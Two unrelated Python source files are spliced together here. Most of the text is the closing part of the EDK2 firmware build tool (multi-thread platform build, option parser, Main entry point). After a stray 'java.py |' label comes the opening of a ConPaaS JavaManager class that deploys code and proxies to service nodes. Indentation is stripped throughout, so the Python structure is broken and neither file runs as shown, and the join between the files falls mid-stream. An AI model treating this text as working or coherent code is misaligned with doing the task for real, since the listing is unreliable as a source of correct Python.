Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None: continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache is None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase is None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
java.py | # -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from xml.dom import minidom
from tempfile import mkdtemp
from shutil import rmtree
import zipfile, tempfile, stat, os.path
from conpaas.services.webservers.manager.config import CodeVersion, JavaServiceConfiguration
from conpaas.services.webservers.agent import client
from conpaas.services.webservers.misc import archive_open, archive_get_members
from conpaas.core.https.server import HttpErrorResponse, HttpJsonResponse
from . import BasicWebserversManager, ManagerException
from conpaas.core.expose import expose
from conpaas.core import git
class JavaManager(BasicWebserversManager):
def __init__(self, config_parser, **kwargs):
BasicWebserversManager.__init__(self, config_parser)
if kwargs['reset_config']:
self._create_initial_configuration()
def _update_code(self, config, nodes):
for serviceNode in nodes:
# Push the current code version via GIT if necessary
if config.codeVersions[config.currentCodeVersion].type == 'git':
_, err = git.git_push(git.DEFAULT_CODE_REPO, serviceNode.ip)
if err:
self.logger.debug('git-push to %s: %s' % (serviceNode.ip, err))
try:
if serviceNode.isRunningBackend: ## UPLOAD TOMCAT CODE TO TOMCAT
client.updateTomcatCode(serviceNode.ip, 5555, config.currentCodeVersion, config.codeVersions[config.currentCodeVersion].type, os.path.join(self.code_repo, config.currentCodeVersion))
if serviceNode.isRunningProxy or serviceNode.isRunningWeb:
client.updatePHPCode(serviceNode.ip, 5555, config.currentCodeVersion, config.codeVersions[config.currentCodeVersion].type, os.path.join(self.code_repo, config.currentCodeVersion))
except client.AgentException:
self.logger.exception('Failed to update code at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to update code at node %s' % str(serviceNode))
return
def _start_proxy(self, config, nodes):
kwargs = {
'web_list': config.getWebTuples(),
'tomcat_list': config.getBackendTuples(),
'tomcat_servlets': self._get_servlet_urls(config.currentCodeVersion),
}
for proxyNode in nodes:
try:
if config.currentCodeVersion != None:
client.createHttpProxy(proxyNode.ip, 5555,
config.proxy_config.port,
config.currentCodeVersion,
**kwargs)
except client.AgentException:
self.logger.exception('Failed to start proxy at node %s' % str(proxyNode))
self._state_set(self.S_ERROR, msg='Failed to start proxy at node %s' % str(proxyNode))
raise
def _update_proxy(self, config, nodes):
kwargs = {
'web_list': config.getWebTuples(),
'tomcat_list': config.getBackendTuples(),
'tomcat_servlets': self._get_servlet_urls(config.currentCodeVersion),
}
for proxyNode in nodes:
try:
if config.currentCodeVersion != None:
client.updateHttpProxy(proxyNode.ip, 5555,
config.proxy_config.port,
config.currentCodeVersion,
**kwargs)
except client.AgentException:
self.logger.exception('Failed to update proxy at node %s' % str(proxyNode))
self._state_set(self.S_ERROR, msg='Failed to update proxy at node %s' % str(proxyNode))
raise
